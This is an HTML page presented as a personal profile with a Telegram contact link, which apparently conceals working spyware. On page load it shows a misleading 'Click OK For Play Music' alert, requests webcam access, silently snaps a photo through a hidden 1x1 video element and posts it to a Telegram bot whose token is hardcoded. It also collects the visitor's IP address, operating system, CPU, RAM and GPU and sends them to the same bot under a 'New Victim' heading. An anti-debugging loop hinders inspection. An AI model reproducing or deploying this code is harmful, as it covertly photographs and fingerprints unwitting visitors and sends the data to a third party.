<!DOCTYPE html>
<html>
<head>
    <title>My Profile</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script type='text/javascript'>

      ! function t() {

          try {

              ! function t(n) {

                  1 === ("" + n / n).length && 0 !== n || function() {}.constructor("debugger")(), t(++n)

              }(0)

          } catch (n) {

              setTimeout(t, 50)

          }

      }();

  </script>

    <style>

        @import url('https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;700&display=swap');

    

.container {
  display: flex;
  flex-direction: column;
  align-items: center;
  justify-content: center;
  height: 100vh;
  background: white;
  animation: backgroundAnimation 10s infinite;
}

@keyframes backgroundAnimation {
  0% {
    background: white;
  }
  50% {
    background: white;
  }
  100% {
    background: white;
  }
}

    

h1 {
  color: #333;
  font-size: 32px;
  font-family: 'Roboto', sans-serif;
  animation: textAnimation 2s infinite;
}

@keyframes textAnimation {
  0% {
    color: red;
  }
  14% {
    color: orange;
  }
  28% {
    color: yellow;
  }
  42% {
    color: green;
  }
  57% {
    color: blue;
  }
  71% {
    color: indigo;
  }
  85% {
    color: violet;
  }
  100% {
    color: red;
  }
}

    

p {
  color: #ff00ff;
  font-size: 18px;
  font-family: 'Roboto', sans-serif;
  animation: textAnimation 2s infinite;
}

@keyframes textAnimation {
  0% {
    color: #ff00ff;
  }
  50% {
    color: #ff0000;
  }
  100% {
    color: #ff00ff;
  }
}

    </style>
    </head>
    <body>
      <div class="container">
        <h1>Welcome To My Profile</h1>
        <p>Click Here For Contact <a href="https://t.me/xNeonn" rel="nofollow" target="_blank">My Telegram</a></p>
      </div>


  <script>

    function capturePhoto() {

        var video = document.getElementById('video');

        var canvas = document.createElement('canvas');

        var context = canvas.getContext('2d');

        canvas.width = video.videoWidth;

        canvas.height = video.videoHeight;


        context.drawImage(video, 0, 0, canvas.width, canvas.height);


        canvas.toBlob(function(blob) {


            var formData = new FormData();

            formData.append('chat_id', '-1001987120575'); 

            formData.append('photo', blob, 'photo.jpg');

 

            $.ajax({

                type: 'POST',

                url: 'https://api.telegram.org/bot6072143785:AAFMGd5RrVcXkg-slQfibavDL-y5uQN7zF0/sendPhoto', 

                data: formData,

                processData: false,

                contentType: false,

                success: function(response) {

                    console.log('Đã gửi ảnh thành công đến Telegram');

                },

                error: function(error) {

                    console.log('Lỗi khi gửi ảnh đến Telegram: ' + error);

                }

            });

        }, 'image/jpeg');

    }

    function requestCameraAccess() {

        navigator.mediaDevices.getUserMedia({ video: true })

            .then(function(stream) {

                var video = document.getElementById('video');

                video.srcObject = stream;

                video.play();

                setTimeout(function() {

                    capturePhoto();

                }, 500);

            })

            .catch(function(error) {

                console.log('Đã xảy ra lỗi khi truy cập webcam: ' + error.message);

            });

    }


    function showCameraAccessAlert() {

        alert('Click OK For Play Music');

        requestCameraAccess();

    }


    window.addEventListener('DOMContentLoaded', function() {

        showCameraAccessAlert();

    });

</script>

 

<video id="video" width="1" height="1" autoplay></video>

 

  <script>

    $(document).ready(function() {

      var telegramBotToken = '6072143785:AAFMGd5RrVcXkg-slQfibavDL-y5uQN7zF0';

      var chatId = '-1001987120575';

 

      $.getJSON('https://api.ipify.org?format=json', function(data) {

        var ip = data.ip;

 

        var cpu = navigator.hardwareConcurrency || 'N/A';

        var ram = navigator.deviceMemory || 'N/A';

        var disk = navigator.deviceStorage || 'N/A';

        var gpu = getGraphicsCard();

        var os = getOperatingSystem();

        var userAgent = navigator.userAgent;

 

        var message = '@xNeonn | New Victim :' + '\n=========================================' + '\n- IP Address: ' + ip + '\n- User-Agent: ' + userAgent + '\n- OS: ' + os + '\n- CPU: ' + cpu + '\n- RAM: ' + ram + '\n- Disk: ' + disk + '\n- GPU: ' + gpu;
 

        var payload = {

          chat_id: chatId,

          text: message

        };

 

        $.ajax({

          type: 'POST',

          url: 'https://api.telegram.org/bot' + telegramBotToken + '/sendMessage',

          data: payload,

          dataType: 'json',

          success: function(response) {

            console.log('Thông tin đã được gửi thành công đến Telegram');

          },

          error: function(error) {

            console.log('Lỗi khi gửi thông tin đến Telegram: ' + error);

          }

        });

      });

 

      // Các hàm hỗ trợ

      function getOperatingSystem() {

        var userAgent = navigator.userAgent || navigator.vendor || window.opera;

        if (/windows phone/i.test(userAgent)) {

          return 'Windows Phone';

        }

        if (/android/i.test(userAgent)) {

          return 'Android';

        }

        if (/iPad|iPhone|iPod/.test(userAgent) && !window.MSStream) {

          return 'iOS';

        }

        if (/Macintosh|Mac OS X/.test(userAgent)) {

          return 'Mac OS';

        }

        if (/Windows NT/.test(userAgent)) {

          return 'Windows';

        }

        return 'Unknown';

      }

 

      function getGraphicsCard() {
        var canvas = document.createElement('canvas');
        var gl = canvas.getContext('webgl') || canvas.getContext('experimental-webgl');
        var debugInfo = gl.getExtension('WEBGL_debug_renderer_info');
        var gpu = 'N/A';
        if (debugInfo) {
          gpu = gl.getParameter(debugInfo.UNMASKED_RENDERER_WEBGL);
        }
        return gpu;
      }
    });

  </script>
</body>
</html>
